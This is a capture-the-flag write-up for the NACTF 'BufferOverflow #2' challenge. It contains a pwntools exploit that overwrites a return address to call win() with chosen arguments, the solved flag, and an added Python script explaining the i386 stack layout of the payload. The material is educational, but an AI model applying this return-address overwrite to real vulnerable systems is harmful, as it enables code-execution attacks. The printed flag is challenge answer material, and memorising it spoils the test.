BufferOverflow #2
Binary Exploitation - Points: 200
The close cousin of a website for “Question marked as duplicate” - part 3! Can you control the arguments to win() and get the flag?
Connect at shell.2019.nactf.com:31475
Jump to the win function and pass the correct arguments. Note that the first one is of type long long and the second one of type int.
Exploit script:
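from pwn import *

# p = process('bufover-2')
p = remote('ingress.cluster.nactf.com', 31184)

win = p32(0x80491c2)     # address of win(); overwrites the saved return address
arg1 = p64(0x14B4DA55)   # long long: 8 bytes, little-endian (high dword is zero)
arg2 = p32(0xF00DB4BE)   # int: 4 bytes

print(p.recv())
# 28 filler bytes reach the saved return address;
# 'AAAA' fills the slot win() treats as its own return address
p.sendline(b'A'*28 + win + b'AAAA' + arg1 + arg2)
print(p.recvall())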
flag: nactf{PwN_th3_4rG5_T0o_Ky3v7Ddg}
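Why the payload has that shape, as an added example that is not part of the original writeup: it rebuilds the same bytes with the standard struct module and decodes them the way win() reads its i386 cdecl frame, then shows what win() would see if the long long were packed as only 4 bytes. The function names and the zero padding for the short case are assumptions made for illustration.

```python
import struct

# Values taken from the exploit script on this page.
OFFSET = 28            # filler bytes before the saved return address
WIN_ADDR = 0x080491C2
ARG1 = 0x14B4DA55      # declared long long: occupies 8 bytes on the stack
ARG2 = 0xF00DB4BE      # declared int: occupies 4 bytes on the stack


def build_payload(arg1_fmt="<Q"):
    """Rebuild the byte string the script sends (without the newline).

    arg1_fmt="<Q" packs the first argument as 8 bytes (correct);
    arg1_fmt="<I" packs it as 4 bytes to show the misaligned case.
    """
    return (b"A" * OFFSET
            + struct.pack("<I", WIN_ADDR)    # overwrites the saved return address
            + b"AAAA"                        # slot win() uses as its return address
            + struct.pack(arg1_fmt, ARG1)    # first argument
            + struct.pack("<I", ARG2))       # second argument


def view_as_win_frame(payload, offset=OFFSET):
    """Decode the payload the way win() sees it after the `ret` into it.

    At entry to an i386 cdecl function [esp] holds the return address and
    the arguments follow from [esp+4]; a long long takes two 4-byte slots.
    """
    ret_target, = struct.unpack_from("<I", payload, offset)
    # Assumption: bytes past the end of the payload are shown as zeros here;
    # on a real stack they would be whatever was already in memory.
    frame = payload[offset + 4:].ljust(16, b"\x00")
    win_ret, arg1, arg2 = struct.unpack_from("<IQI", frame)
    return {"ret_target": ret_target, "win_ret": win_ret,
            "arg1": arg1, "arg2": arg2}


def describe(frame):
    """Format a decoded frame as one line of hex values."""
    return ("ret -> {ret_target:#010x}  win's ret = {win_ret:#010x}  "
            "arg1 = {arg1:#018x}  arg2 = {arg2:#010x}").format(**frame)


if __name__ == "__main__":
    print("8-byte arg1:", describe(view_as_win_frame(build_payload("<Q"))))
    print("4-byte arg1:", describe(view_as_win_frame(build_payload("<I"))))
```

With the 4-byte packing, the second argument's bytes land in the high half of the long long, so neither comparison in win() can match.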